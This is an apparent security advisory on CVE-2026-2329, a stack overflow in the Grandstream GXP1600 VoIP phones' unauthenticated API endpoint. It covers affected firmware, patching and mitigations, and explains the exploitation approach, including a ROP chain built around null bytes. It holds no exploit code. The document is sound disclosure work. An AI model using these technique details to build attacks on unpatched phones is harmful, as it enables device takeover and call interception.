Vulnerability Overview
Rapid7 Labs disclosed a critical zero-day vulnerability on February 18, 2026 affecting the entire Grandstream GXP1600 series of Voice over Internet Protocol (VoIP) phones. Tracked as CVE-2026-2329, the flaw is a stack-based buffer overflow in the device's web-based API service that allows an unauthenticated remote attacker to achieve full remote code execution with root privileges on the target device.
The vulnerability is present in the device's unauthenticated web API endpoint and is accessible in a default configuration. A maliciously crafted HTTP POST request triggers the overflow, giving the attacker control over the program counter and ultimately full command execution on the underlying operating system.
Security researcher Stephen Fewer of Rapid7 discovered the vulnerability during a targeted zero-day research initiative. A working Metasploit exploit module and a companion post-exploitation module for credential extraction have been developed and are publicly available on GitHub.
Technical Details
CVE-2026-2329 is a stack-based buffer overflow vulnerability in the gs_web binary, a 32-bit ARM (Little Endian) native code process that implements both the web administration interface and the API on Grandstream GXP1600 series phones. The vulnerable endpoint, /cgi-bin/api.values.get, is designed to accept an HTTP POST parameter called "request" containing a colon-delimited list of identifiers to retrieve configuration values from the device.
Internally, the function that parses this parameter iterates character by character and copies each identifier into a 64-byte stack buffer. When a colon character is encountered, the buffer is null-terminated, processed, and reset for the next identifier. The critical flaw is that no bounds checking is performed on the length of each identifier before it is written to the buffer, allowing an attacker to overflow past the 64-byte boundary and corrupt adjacent stack memory.
This stack corruption gives the attacker direct control over multiple CPU registers, including the Program Counter (PC), effectively allowing arbitrary code execution when the vulnerable function returns. The endpoint requires no authentication and is accessible in a default device configuration.
Analysis of the gs_web binary reveals that stack canaries are not present, NX (No Execute) is enabled, and the binary is not compiled as a Position Independent Executable (PIE). The non-PIE base address of 0x00008000 introduces null bytes into ROP gadget addresses. Rapid7 overcame this by exploiting the colon-delimited parsing behavior — each identifier is null-terminated independently, so chaining multiple overflows with carefully sized identifiers allows precise placement of null bytes throughout the ROP chain payload.
Affected Versions
All six models in the GXP1600 series share a common firmware image, meaning every device in the lineup is affected. The vulnerability is present in all firmware versions prior to 1.0.7.81.
| Model | Vulnerable Firmware | Fixed Firmware | Status |
|---|---|---|---|
| GXP1610 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
| GXP1615 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
| GXP1620 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
| GXP1625 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
| GXP1628 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
| GXP1630 | All versions < 1.0.7.81 | 1.0.7.81 |
Patch Available |
Recommendations
- Update firmware immediately. Upgrade all GXP1600 series devices to firmware version 1.0.7.81 or later. The latest firmware is available from the Grandstream firmware downloads page.
- Restrict web interface access. Limit network access to the phone's web administration interface (TCP port 80) to trusted management subnets only using firewall rules or ACLs.
- Segment VoIP infrastructure. Place VoIP phones on a dedicated VLAN that is not directly accessible from untrusted networks or general user segments to reduce the attack surface.
- Monitor for exploitation attempts. Review network logs for unusual HTTP POST requests targeting /cgi-bin/api.values.get with abnormally long parameter values, which may indicate exploitation attempts.
- Audit SIP credentials. After patching, rotate any SIP account credentials and local user passwords stored on GXP1600 devices as a precaution against potential prior compromise.
Context
VoIP phones are increasingly targeted by threat actors due to their always-on network presence, often limited security monitoring, and the sensitive nature of voice communications they handle. Successful exploitation of CVE-2026-2329 not only provides root-level access to the device itself but also enables call interception by reconfiguring the phone's SIP proxy to route traffic through an attacker-controlled server.
Rapid7 developed a SIP proxy tool for testing and auditing SIP infrastructure, which is available on GitHub. The vulnerability was disclosed in accordance with Rapid7's vulnerability disclosure policy, with coordinated vendor notification beginning on January 6, 2026 and public disclosure on February 18, 2026.
